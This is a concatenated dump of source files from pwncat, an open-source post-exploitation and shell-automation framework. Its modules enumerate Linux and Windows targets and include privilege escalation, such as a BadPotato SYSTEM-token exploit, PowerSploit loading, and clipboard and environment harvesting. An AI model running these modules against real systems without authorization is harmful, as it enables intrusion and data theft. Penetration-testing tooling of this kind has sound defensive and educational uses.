https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/agnostic/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/clean.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import Status, BaseModule, ModuleFailed
5 |
6 |
7 | class Module(BaseModule):
8 | """Clean up any modifications to the target. This mainly includes
9 | tampers saved in the database, but could include other changes added
10 | to future versions of pwncat."""
11 |
12 | PLATFORM = None
13 |
14 | def run(self, session: "pwncat.manager.Session"):
15 | """Iterate over all tampers and revert what we can"""
16 |
17 | current_user = session.current_user()
18 |
19 | for tamper in session.run("enumerate", types=["tamper"]):
20 | if not tamper.revertable:
21 | session.log(
22 | f"[yellow]warning[/yellow]: {tamper.title(session)}: not revertable"
23 | )
24 | continue
25 | if current_user.id != tamper.uid:
26 | session.log(
27 | f"[yellow]warning[/yellow]: {tamper.title(session)}: incorrect uid to revert"
28 | )
29 | continue
30 |
31 | try:
32 | # Attempt tamper revert
33 | yield Status(tamper.title(session))
34 | tamper.revert(session)
35 | except ModuleFailed as exc:
36 | session.log(f"[yellow]warning[/yellow]: {tamper.title(session)}: {exc}")
37 |
38 | session.db.transaction_manager.commit()
39 |
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/enumerate/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | # Alias `run enumerate` to `run enumerate.gather`
4 | from pwncat.modules.agnostic.enumerate.gather import Module # noqa: F401
5 |
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/enumerate/escalate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/agnostic/enumerate/escalate/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/enumerate/escalate/implant.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.facts import Implant, EscalationSpawn, EscalationReplace
5 | from pwncat.modules.enumerate import Schedule, EnumerateModule
6 |
7 |
8 | class ImplantEscalationReplace(EscalationReplace):
9 | def __init__(self, implant: Implant):
10 | super().__init__(implant.source, None, implant.uid)
11 |
12 | self.implant: Implant = implant
13 |
14 | def escalate(self, session: "pwncat.manager.Session"):
15 |
16 | return self.implant.escalate(session)
17 |
18 | def title(self, session: "pwncat.manager.Session"):
19 | return f"""implant: {self.implant.title(session)}"""
20 |
21 |
22 | class ImplantEscalationSpawn(EscalationSpawn):
23 | def __init__(self, implant: Implant):
24 | super().__init__(implant.source, None, implant.uid)
25 |
26 | self.implant: Implant = implant
27 |
28 | def escalate(self, session: "pwncat.manager.Session"):
29 |
30 | return self.implant.escalate(session)
31 |
32 | def title(self, session: "pwncat.manager.Session"):
33 | return f"""implant: {self.implant.title(session)}"""
34 |
35 |
36 | class Module(EnumerateModule):
37 | """Generates escalation methods based on installed implants in
38 | order to facilitate their usage during automated escalation."""
39 |
40 | PLATFORM = None
41 | SCHEDULE = Schedule.ALWAYS
42 | PROVIDES = ["escalate.replace", "escalate.spawn"]
43 |
44 | def enumerate(self, session):
45 |
46 | for implant in session.run(
47 | "enumerate", types=["implant.replace", "implant.spawn"]
48 | ):
49 | if "implant.replace" in implant.types:
50 | yield ImplantEscalationReplace(implant)
51 | elif "implant.spawn" in implant.types:
52 | yield ImplantEscalationSpawn(implant)
53 |
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/enumerate/escalate/replace.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.facts import ExecuteAbility, EscalationReplace
5 | from pwncat.modules.enumerate import Schedule, EnumerateModule
6 |
7 |
8 | class DirectReplaceAbility(EscalationReplace):
9 | def __init__(self, source, ability: ExecuteAbility):
10 | super().__init__(source, ability.source_uid, ability.uid)
11 |
12 | self.ability: ExecuteAbility = ability
13 |
14 | def escalate(self, session: "pwncat.manager.Session"):
15 |
16 | return self.ability.shell(session)
17 |
18 | def title(self, session: "pwncat.manager.Session"):
19 | return self.ability.title(session)
20 |
21 |
22 | class Module(EnumerateModule):
23 | """Locate execute abilities and produce escalation methods from them.
24 | This module produces EscalationReplace results which replace the active
25 | user in the running session with the new user."""
26 |
27 | PLATFORM = None
28 | SCHEDULE = Schedule.ALWAYS
29 | PROVIDES = ["escalate.replace"]
30 |
31 | def enumerate(self, session: "pwncat.manager.Session"):
32 |
33 | for ability in session.run("enumerate", types=["ability.execute"]):
34 | yield DirectReplaceAbility(self.name, ability)
35 |
--------------------------------------------------------------------------------
/pwncat/modules/linux/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/escalate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/escalate/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/escalate/write_authorized_keys.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/escalate/write_authorized_keys.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/file/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/file/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/misc/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/misc/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/misc/writable_path.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import rich.markup
4 |
5 | from pwncat.db import Fact
6 | from pwncat.platform.linux import Linux
7 | from pwncat.modules.enumerate import Schedule, EnumerateModule
8 |
9 |
10 | class WritablePath(Fact):
11 | def __init__(self, source, path):
12 | super().__init__(source=source, types=["misc.writable_path"])
13 |
14 | self.path: str = path
15 |
16 | def title(self, session):
17 | return f"""{rich.markup.escape(self.path)}"""
18 |
19 |
20 | class Module(EnumerateModule):
21 | """
22 | Locate any components of the current PATH that are writable
23 | by the current user.
24 | """
25 |
26 | PROVIDES = ["system.writable_path"]
27 | SCHEDULE = Schedule.PER_USER
28 | PLATFORM = [Linux]
29 |
30 | def enumerate(self, session):
31 |
32 | for path in session.platform.getenv("PATH").split(":"):
33 |
34 | # Ignore empty components
35 | if path == "":
36 | continue
37 |
38 | # Find the first item up the path that exists
39 | path = session.platform.Path(path)
40 | while not path.exists():
41 | path = path.parent
42 |
43 | # See if we have write permission
44 | if path.is_dir() and path.writable():
45 | yield WritablePath(self.name, str(path.resolve()))
46 |
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/software/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/software/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/software/sudo/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/software/sudo/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/system/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/system/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/system/aslr.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwncat.db import Fact
4 | from pwncat.platform.linux import Linux
5 | from pwncat.modules.enumerate import EnumerateModule
6 |
7 |
8 | class ASLRStateData(Fact):
9 | def __init__(self, source, state):
10 | super().__init__(source=source, types=["system.aslr"])
11 |
12 | self.state: int = state
13 | """ the value of /proc/sys/kernel/randomize_va_space """
14 |
15 | def title(self, session):
16 | if self.state == 0:
17 | return "[green]disabled[/green]"
18 | return "[red]enabled[/red]"
19 |
20 |
21 | class Module(EnumerateModule):
22 | """
23 | Determine whether or not ASLR is enabled or disabled.
24 | :return:
25 | """
26 |
27 | PROVIDES = ["system.aslr"]
28 | PLATFORM = [Linux]
29 |
30 | def enumerate(self, session):
31 |
32 | try:
33 | with session.platform.open(
34 | "/proc/sys/kernel/randomize_va_space", "r"
35 | ) as filp:
36 | value = filp.read()
37 | try:
38 | value = int(value)
39 | except ValueError:
40 | value = None
41 |
42 | if value is not None:
43 | yield ASLRStateData(self.name, value)
44 | except (FileNotFoundError, PermissionError):
45 | pass
46 |
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/user/group.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import Status, ModuleFailed
5 | from pwncat.facts.linux import LinuxGroup
6 | from pwncat.platform.linux import Linux
7 | from pwncat.modules.enumerate import Schedule, EnumerateModule
8 |
9 |
10 | class Module(EnumerateModule):
11 | """Enumerate users from a linux target"""
12 |
13 | PROVIDES = ["group"]
14 | PLATFORM = [Linux]
15 | SCHEDULE = Schedule.ONCE
16 |
17 | def enumerate(self, session: "pwncat.manager.Session"):
18 |
19 | # Grab all the users and sort by their group ID
20 | users = {user.gid: user for user in session.run("enumerate", types=["user"])}
21 |
22 | group_file = session.platform.Path("/etc/group")
23 | groups = []
24 |
25 | try:
26 | with group_file.open("r") as filp:
27 | for group_line in filp:
28 | try:
29 | # Extract the group fields
30 | (group_name, hash, gid, members) = group_line.split(":")
31 | gid = int(gid)
32 | members = [m.strip() for m in members.split(",") if m.strip()]
33 |
34 | if gid in users:
35 | members.append(users[gid].name)
36 |
37 | # Build a group object
38 | groups.append(
39 | LinuxGroup(self.name, group_name, hash, gid, members)
40 | )
41 |
42 | yield Status(group_name)
43 |
44 | except (KeyError, ValueError, IndexError):
45 | # Bad group line
46 | continue
47 |
48 | yield from groups
49 |
50 | except (FileNotFoundError, PermissionError) as exc:
51 | raise ModuleFailed(str(exc)) from exc
52 |
--------------------------------------------------------------------------------
/pwncat/modules/linux/implant/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/implant/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/enumerate/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/domain/fileserver.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import Status
5 | from pwncat.platform.windows import Windows, PowershellError
6 | from pwncat.modules.enumerate import Schedule, EnumerateModule
7 |
8 |
9 | class Module(EnumerateModule):
10 | """Retrieve information on all domain computers"""
11 |
12 | PLATFORM = [Windows]
13 | PROVIDES = ["domain.fileserver"]
14 | SCHEDULE = Schedule.ONCE
15 |
16 | def enumerate(self, session: "pwncat.manager.Session"):
17 | """Perform enumeration"""
18 |
19 | # Check that we are in a domain
20 | if not session.run("enumerate", types=["domain.details"]):
21 | return
22 |
23 | # Ensure we have PowerView loaded
24 | yield Status("loading powersploit recon")
25 | session.run("powersploit", group="recon")
26 |
27 | try:
28 | yield Status("requesting domain file servers")
29 | names = session.platform.powershell("Get-DomainFileServer")[0]
30 | except (IndexError, PowershellError):
31 | return
32 |
33 | if not isinstance(names, list):
34 | names = [names]
35 |
36 | names = [name.lower() for name in names]
37 |
38 | for computer in session.run("enumerate.domain.computer"):
39 | if computer["name"].lower() in names:
40 | yield computer
41 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/domain/site.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from typing import Dict
3 |
4 | import pwncat
5 | from pwncat.db import Fact
6 | from pwncat.modules import Status
7 | from pwncat.platform.windows import Windows, PowershellError
8 | from pwncat.modules.enumerate import Schedule, EnumerateModule
9 |
10 |
11 | class SiteObject(Fact):
12 | def __init__(self, source: str, data: Dict):
13 | super().__init__(source=source, types=["domain.site"])
14 |
15 | self.site = data
16 |
17 | def __getitem__(self, name: str):
18 | """Shortcut for getting properties from the `self.site` property."""
19 |
20 | return self.site[name]
21 |
22 | def title(self, session: "pwncat.manager.Session"):
23 | return f"[cyan]{self['distinguishedname']}[/cyan]"
24 |
25 |
26 | class Module(EnumerateModule):
27 | """Retrieve information on all domain computers"""
28 |
29 | PLATFORM = [Windows]
30 | PROVIDES = ["domain.site"]
31 | SCHEDULE = Schedule.ONCE
32 |
33 | def enumerate(self, session: "pwncat.manager.Session"):
34 | """Perform enumeration"""
35 |
36 | # Check that we are in a domain
37 | if not session.run("enumerate", types=["domain.details"]):
38 | return
39 |
40 | # Ensure we have PowerView loaded
41 | yield Status("loading powersploit recon")
42 | session.run("powersploit", group="recon")
43 |
44 | try:
45 | yield Status("requesting domain sites")
46 | sites = session.platform.powershell("Get-DomainSite")[0]
47 | except (IndexError, PowershellError):
48 | # Doesn't appear to be a domain joined site
49 | return
50 |
51 | if isinstance(sites, dict):
52 | yield SiteObject(self.name, sites)
53 | else:
54 | yield from (SiteObject(self.name, site) for site in sites)
55 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/network/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/enumerate/network/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/protections/antivirus.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | import rich.markup
5 |
6 | import pwncat
7 | from pwncat.db import Fact
8 | from pwncat.platform.windows import Windows
9 | from pwncat.modules.enumerate import EnumerateModule
10 |
11 | """
12 | TODO: This should use csvreader.
13 | """
14 |
15 |
16 | class MountedDrive(Fact):
17 | def __init__(self, source, av_name: str, exe_path: str):
18 | super().__init__(source=source, types=["protection.antivirus"])
19 |
20 | self.av_name: str = av_name
21 | self.exe_path: str = exe_path
22 |
23 | def title(self, session):
24 | return f"Antivirus [red]{rich.markup.escape(self.av_name)}[/red] running from [yellow]{rich.markup.escape(self.exe_path)}[/yellow]"
25 |
26 |
27 | class Module(EnumerateModule):
28 | """Enumerate the current Windows Defender settings on the target"""
29 |
30 | PROVIDES = ["protection.antivirus"]
31 | PLATFORM = [Windows]
32 |
33 | def enumerate(self, session):
34 |
35 | proc = session.platform.Popen(
36 | [
37 | "wmic.exe",
38 | "/Node:localhost",
39 | "/Namespace:\\\\root\\SecurityCenter2",
40 | "Path",
41 | "AntiVirusProduct",
42 | "Get",
43 | "displayName,pathToSignedReportingExe",
44 | "/Format:csv",
45 | ],
46 | stderr=pwncat.subprocess.DEVNULL,
47 | stdout=pwncat.subprocess.PIPE,
48 | text=True,
49 | )
50 |
51 | # Process the standard output from the command
52 | with proc.stdout as stream:
53 | for line in stream:
54 | line = line.strip()
55 |
56 | if not line or "displayName,pathToSignedReportingExe" in line:
57 | continue
58 |
59 | _, av_name, exe_path = line.split(",")
60 | yield MountedDrive(self.name, av_name, exe_path)
61 |
62 | proc.wait()
63 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/protections/lsa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwncat.db import Fact
4 | from pwncat.modules import ModuleFailed
5 | from pwncat.platform.windows import Windows, PowershellError
6 | from pwncat.modules.enumerate import EnumerateModule
7 |
8 |
9 | class LSAProtectionData(Fact):
10 | def __init__(self, source, active: bool):
11 | super().__init__(source=source, types=["protections.lsa"])
12 |
13 | self.active: bool = active
14 |
15 | def title(self, session):
16 | out = "LSA Protection is "
17 | out += (
18 | "[bold red]active[/bold red]"
19 | if self.active
20 | else "[bold green]inactive[/bold green]"
21 | )
22 | return out
23 |
24 | def description(self, session):
25 | return None
26 |
27 |
28 | class Module(EnumerateModule):
29 | """Enumerate the current Windows Defender settings on the target"""
30 |
31 | PROVIDES = ["protections.lsa"]
32 | PLATFORM = [Windows]
33 |
34 | def enumerate(self, session):
35 |
36 | registry_value = "RunAsPPL"
37 | registry_key = "HKLM:\\SYSTEM\\CurrentControlSet\\Control\\LSA"
38 |
39 | try:
40 | result = session.platform.powershell(
41 | f"Get-ItemPropertyValue {registry_key} -Name {registry_value}"
42 | )
43 |
44 | if not result:
45 | raise ModuleFailed(
46 | f"failed to retrieve registry value {registry_value}"
47 | )
48 |
49 | status = bool(result[0])
50 |
51 | except PowershellError as exc:
52 | if "does not exist" in exc.message:
53 | status = bool(0) # default
54 | else:
55 | raise ModuleFailed(
56 | f"could not retrieve registry value {registry_value}: {exc}"
57 | ) from exc
58 |
59 | yield LSAProtectionData(self.name, status)
60 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/system/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/enumerate/system/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/system/clipboard.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | import rich.markup
5 |
6 | from pwncat.db import Fact
7 | from pwncat.modules import ModuleFailed
8 | from pwncat.platform.windows import Windows, PowershellError
9 | from pwncat.modules.enumerate import EnumerateModule
10 |
11 |
12 | class ClipboardData(Fact):
13 | def __init__(self, source, contents: str):
14 | super().__init__(source=source, types=["system.clipboard"])
15 |
16 | self.contents: bool = contents
17 |
18 | def title(self, session):
19 | return "Current clipboard contents:"
20 |
21 | def description(self, session):
22 | return f"[yellow]{rich.markup.escape(self.contents)}[/yellow]"
23 |
24 |
25 | class Module(EnumerateModule):
26 | """Enumerate the current Windows Defender settings on the target"""
27 |
28 | PROVIDES = ["system.clipboard"]
29 | PLATFORM = [Windows]
30 |
31 | def enumerate(self, session):
32 |
33 | try:
34 | result = session.platform.powershell("Get-Clipboard")
35 |
36 | if not result:
37 | return
38 |
39 | if isinstance(result[0], list) and result:
40 | contents = "\n".join(result[0])
41 | else:
42 | contents = result[0]
43 |
44 | except PowershellError as exc:
45 | raise ModuleFailed("failed to retrieve clipboard contents") from exc
46 |
47 | yield ClipboardData(self.name, contents)
48 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/system/environment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | import rich.markup
5 |
6 | from pwncat.db import Fact
7 | from pwncat.modules import ModuleFailed
8 | from pwncat.platform.windows import Windows, PowershellError
9 | from pwncat.modules.enumerate import EnumerateModule
10 |
11 |
12 | class EnvironmentData(Fact):
13 | def __init__(self, source, variable: str, value: str):
14 | super().__init__(source=source, types=["system.environment"])
15 |
16 | self.variable: bool = variable
17 | self.value: str = value
18 |
19 | def title(self, session):
20 | return f"[cyan]{rich.markup.escape(self.variable)}[/cyan] = [blue]{rich.markup.escape(self.value)} [/blue]"
21 |
22 |
23 | class Module(EnumerateModule):
24 | """Enumerate the current Windows Defender settings on the target"""
25 |
26 | PROVIDES = ["system.environment"]
27 | PLATFORM = [Windows]
28 |
29 | def enumerate(self, session):
30 |
31 | try:
32 | result = session.platform.powershell(
33 | "Get-ChildItem env:\\ | Select Name,Value"
34 | )
35 |
36 | if not result:
37 | raise ModuleFailed("failed to retrieve env: PSDrive")
38 |
39 | environment = result[0]
40 |
41 | except PowershellError as exc:
42 | raise ModuleFailed("failed to retrieve env: PSDrive") from exc
43 |
44 | for pair in environment:
45 | yield EnvironmentData(self.name, pair["Name"], pair["Value"])
46 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/system/programs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | import rich.markup
5 |
6 | from pwncat.db import Fact
7 | from pwncat.modules import ModuleFailed
8 | from pwncat.platform.windows import Windows, PowershellError
9 | from pwncat.modules.enumerate import EnumerateModule
10 |
11 |
12 | class InstalledProgramData(Fact):
13 | def __init__(self, source, path: bool):
14 | super().__init__(source=source, types=["system.programs"])
15 |
16 | self.path: bool = path
17 |
18 | def title(self, session):
19 | return f"{rich.markup.escape(repr(self.path))}"
20 |
21 |
22 | class Module(EnumerateModule):
23 | """Enumerate the current Windows Defender settings on the target"""
24 |
25 | PROVIDES = ["system.programs"]
26 | PLATFORM = [Windows]
27 |
28 | def enumerate(self, session):
29 |
30 | try:
31 | program_files = session.platform.powershell(
32 | 'Get-ChildItem "C:\\Program Files","C:\\Program Files (x86)" -ErrorAction SilentlyContinue | Select Fullname'
33 | )[0]
34 |
35 | if not isinstance(program_files, list):
36 | program_files = [program_files]
37 |
38 | for path in program_files:
39 | yield InstalledProgramData(self.name, path["FullName"])
40 |
41 | except (PowershellError, IndexError) as exc:
42 | raise ModuleFailed(
43 | f"failed to list program file directories: {exc}"
44 | ) from exc
45 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/token/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/enumerate/token/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/token/potato.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import Status, ModuleFailed
5 | from pwncat.facts.windows import UserToken
6 | from pwncat.platform.windows import Windows, ProtocolError
7 | from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule
8 |
9 |
10 | class Module(EnumerateModule):
11 | """Execute the BadPotato expoit to leak a SYSTEM user token"""
12 |
13 | PLATFORM = [Windows]
14 | SCHEDULE = Schedule.PER_USER
15 | SCOPE = Scope.SESSION
16 | PROVIDES = ["token", "ability.execute"]
17 |
18 | def enumerate(self, session: "pwncat.manager.Session"):
19 |
20 | # Non-admin users will crash the C2 if we try bad potato
21 | if not session.platform.is_admin():
22 | return
23 |
24 | try:
25 | # Load the badpotato plugin
26 | yield Status("loading badpotato c2 plugin...")
27 | badpotato = session.platform.dotnet_load("BadPotato.dll")
28 |
29 | # Grab a system token
30 | yield Status("triggering badpotato exploit...")
31 | token = badpotato.get_system_token()
32 |
33 | # Yield the new SYSTEM token
34 | yield UserToken(
35 | source=self.name,
36 | uid=session.find_user(name="NT AUTHORITY\\SYSTEM").id,
37 | token=token,
38 | )
39 | except ProtocolError as exc:
40 | raise ModuleFailed(f"failed to load badpotato: {exc}")
41 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/token/privs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import pwncat
3 | from pwncat.modules import ModuleFailed
4 | from pwncat.facts.windows import ProcessTokenPrivilege
5 | from pwncat.platform.windows import Windows, PowershellError
6 | from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule
7 |
8 |
9 | class Module(EnumerateModule):
10 | """Locate process privileges"""
11 |
12 | PLATFORM = [Windows]
13 | SCHEDULE = Schedule.PER_USER
14 | SCOPE = Scope.SESSION
15 | PROVIDES = ["token.privilege"]
16 |
17 | def enumerate(self, session: "pwncat.manager.Session"):
18 | """Check for privileges"""
19 |
20 | # Load PowerUp.ps1
21 | session.run("powersploit", group="privesc")
22 |
23 | try:
24 | privs = session.platform.powershell("Get-ProcessTokenPrivilege")[0]
25 | except (IndexError, PowershellError) as exc:
26 | raise ModuleFailed(f"failed to find process token privs: {exc}")
27 |
28 | for priv in privs:
29 | yield ProcessTokenPrivilege(
30 | source=self.name,
31 | name=priv["Privilege"],
32 | attributes=priv["Attributes"],
33 | handle=priv["TokenHandle"],
34 | pid=priv["ProcessId"],
35 | )
36 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/user/group.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import ModuleFailed
5 | from pwncat.facts.windows import WindowsGroup
6 | from pwncat.platform.windows import Windows, PowershellError
7 | from pwncat.modules.enumerate import Schedule, EnumerateModule
8 |
9 |
10 | class Module(EnumerateModule):
11 | """Enumerate groups from a windows target"""
12 |
13 | PROVIDES = ["group"]
14 | PLATFORM = [Windows]
15 | SCHEDULE = Schedule.ONCE
16 |
17 | def enumerate(self, session: "pwncat.manager.Session"):
18 | """Yield WindowsGroup objects"""
19 |
20 | try:
21 | groups = session.platform.powershell("Get-LocalGroup")
22 | if not groups:
23 | raise ModuleFailed("no groups returned from Get-LocalGroup")
24 | except PowershellError as exc:
25 | raise ModuleFailed(str(exc)) from exc
26 |
27 | for group in groups[0]:
28 | try:
29 | members = session.platform.powershell(
30 | f"Get-LocalGroupMember {group['Name']}"
31 | )
32 | if members:
33 | members = (
34 | [m["SID"] for m in members[0]]
35 | if isinstance(members[0], list)
36 | else [members[0]["SID"]["Value"]]
37 | )
38 | except PowershellError:
39 | members = []
40 |
41 | yield WindowsGroup(
42 | source=self.name,
43 | name=group["Name"],
44 | gid=group["SID"],
45 | description=group["Description"],
46 | principal_source=group["PrincipalSource"],
47 | members=members,
48 | )
49 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/manage/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/manage/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/manage/powershell/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/manage/powershell/__init__.py
--------------------------------------------------------------------------------
/pwncatrc:
--------------------------------------------------------------------------------
1 | ./data/pwncatrc
--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
1 | [tool.isort]
2 | profile = "black"
3 | length_sort = true
4 |
5 | [tool.pytest.ini_options]
6 | minversion = "6.0"
7 | testpaths = [
8 | "tests",
9 | ]
10 | addopts = "-v"
11 |
12 | [tool.poetry]
13 | name = "pwncat-cs"
14 | version = "0.5.4"
15 | description = "Reverse and bind shell automation framework"
16 | authors = ["Caleb Stewart ", "John Hammond"]
17 | readme = "README.md"
18 | repository = "https://github.com/calebstewart/pwncat"
19 | documentation = "https://pwncat.readthedocs.io"
20 | keywords = ["offsec", "cyber", "exploitation", "privesc", "automation"]
21 | packages = [
22 | { include = "pwncat" },
23 | ]
24 | license = "MIT"
25 |
26 | [tool.poetry.scripts]
27 | pwncat-cs = "pwncat.__main__:main"
28 |
29 | [tool.poetry.urls]
30 | "Bug Tracker" = "https://github.com/calebstewart/pwncat/issues"
31 |
32 | [tool.poetry.dependencies]
33 | python = "^3.9"
34 | netifaces = "^0.11.0"
35 | packaging = "^20.9"
36 | prompt-toolkit = "^3.0.19"
37 | pycryptodome = "^3.10.1"
38 | requests = "^2.25.1"
39 | rich = "^10.4.0"
40 | python-rapidjson = "^1.0"
41 | ZODB3 = "^3.11.0"
42 | zodburi = "^2.5.0"
43 | Jinja2 = "^3.0.1"
44 | paramiko-ng = "^2.8.8"
45 | PyNaCl = "^1.4.0"
46 | sphinx-toolbox = { version = "^2.15.2", optional = true }
47 | Sphinx = { version= "^4.0.2", optional = true }
48 | enum-tools = { version= "^0.7.0", optional = true }
49 | furo = { version= "^2021.11.23", optional = true }
50 |
51 | [tool.poetry.dev-dependencies]
52 | isort = "^5.8.0"
53 | pytest = "^6.2.4"
54 | flake8 = "^3.9.2"
55 |
56 | [tool.poetry.extras]
57 | docs = ["sphinx-toolbox", "Sphinx", "enum-tools", "furo"]
58 |
59 | [build-system]
60 | requires = ["poetry-core>=1.0.0"]
61 | build-backend = "poetry.core.masonry.api"
62 |
--------------------------------------------------------------------------------
/run-tests.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ## Run pytest for pwncat. This script will start up the needed
3 | ## containers locally and then kick off pytest, pointing at the
4 | ## containers.
5 |
6 | echo "[!] we can only test centos and ubuntu locally"
7 |
8 | CENTOS_CONTAINER=$(podman run --rm -d -p :22 -p :4444 -p :9999 -t calebjstewart/pwncat-testing:centos)
9 | echo "[+] started centos container: $CENTOS_CONTAINER"
10 | UBUNTU_CONTAINER=$(podman run --rm -d -p :22 -p :4444 -p :9999 -t calebjstewart/pwncat-testing:ubuntu)
11 | echo "[+] started centos container: $UBUNTU_CONTAINER"
12 |
